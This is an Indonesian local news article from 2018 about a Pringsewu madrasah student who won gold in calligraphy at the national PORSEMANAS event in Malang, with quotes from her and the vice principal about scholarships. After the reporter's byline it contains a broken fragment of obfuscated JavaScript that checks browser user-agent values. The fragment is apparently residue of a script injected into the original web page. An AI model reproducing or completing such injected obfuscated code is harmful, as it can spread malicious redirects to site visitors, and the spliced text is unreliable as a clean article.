PRINGSEWU – Bukan kali pertama dunia pendidikan diKabupaten Pringsewu menorehkan namanya dikancah perlombaan Nasional.

Kali ini datang kabar baik dari Siwa dan siswi Madrasah Aliyah (MA) Ma’arif keputran, Kecamatan Sukoharjo Kabupaten Pringsewu Provinsi Lampung. Yang bisa mengharumkan nama pringsewu dikancah Nasional, Salah satu diantara Duta Provinsi Lampung dalam ajang Pekan Olah Raga dan Seni Ma’arif Nasional (PORSEMANAS) Ke-I yang diselenggarakan di Malang.

Salah satu siswi MA Ma’arif Inayatul Khairiyah berhasil mengukir prestasi dengan menyabet mendali emas sebagai juara I lomba kaligrafi untuk tingkat SMA/MA yang diselenggarakan di Universitas Islam Sultan Malik Ibrahim, Malang-Jawa Timur.

Inayatul Khoiriyah Saat ditemui media ini di Madrasah Aliyah Ma’arif Keputran Mengatakan, Dirinya merasa sangat terharu dan bangga atas mendali emas yang ia dapatkan.

“Tentunya saya sangat terharu dan bangga sudah membawa mendali emas atas nama sekolah Ma’arif dan membawa harum nama pringsewu dan Provinsi Lampung ditingkat Nasional, gak nyangka aja apa yang saya kerjakan membuahkan hasil,”Katanya

Mewakili Teman-teman sekolahnya yang mengikuti PORSEMANAS, Lanjut Inayatul Khoiriyah, Merupakan dikelas X (sepuluh) Jurusan MIA Mengucapkan, Kepada seluruh dewan guru yang sudah membimbing dan mengajarkan serta melatih hingga membuat dirinya (Inayatul Khairiyah) Meraih juara 1 (satu) lomba kaligrafi tingkat Nasional.

“Harapan saya, Semoga tahun yang akan datang, Kami bisa lebih baik dalam mengukir prestasi ditingkat Nasional dan lebih banyak meraih mendali emas dari berbagai cabang olahraga dan seni lainnya,”Ungkapnya.

Sementara itu, Masih ditempat yang sama Wakil Kepala Sekolah Bidang Kesiswaan Wawan Krisdiyanto mewakili kepala sekolah Madrasah Aliyah Ma’arif Keputran Irsadul Ibad saat di konfirmasi diruangan kerjanya, Senin (06/08/2018). Mengungkapkan, Satu kebahagian atas prestasi yang diraih para anak didiknya.

“Pihak sekolah sangat bangga dengan prestasi anak didiknya, dari empat putra dan putri terbaik kami yang mengikuti cabang olahraga bulu tangkis dengan meraih juara 3, lomba lari juara harapan dan yang lebih membanggakan lagi, salah satu siswinya (Inayatul Khairiyah) Meraih juara 1 tingkat nasional dalam lomba seni kaligrafi,”Kata Wawan Krisdiyanto.

Atas nama kepala sekolah dan mewakili dari semua dewan guru, Sambung Wawan Krisdiyanto, Pihaknya sangat mengapresiasi keempat siswa-siswi tersebut, atas prestasi yang ditorehkan dari pihak sekolah akan memberikan beasiswa sampai kelas XII (Dua belas).

“Empat siswa-siswi kami telah mengukir prestasi dikancah nasional, membawa harum nama daerah pringsewu, Tentunya, Lembaga pendidikan Ma’arif sudah mampu melahirkan siswa-siswi berprestasi, Bukan pihak sekolah Ma’arif saja yang bangga. Tapi, Semua masyarakat luas juga bangga atas prestasi yang didapat. Sekolah Ma’arif Keputran juga memberikan beasiswa sampai kelas 3, Semoga atas beasiswa yang diberikan bisa meraih prestasi yang lebih baik lagi,”Tutupnya. (M.IQBAL) 446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

NO COMMENTS

LEAVE A REPLY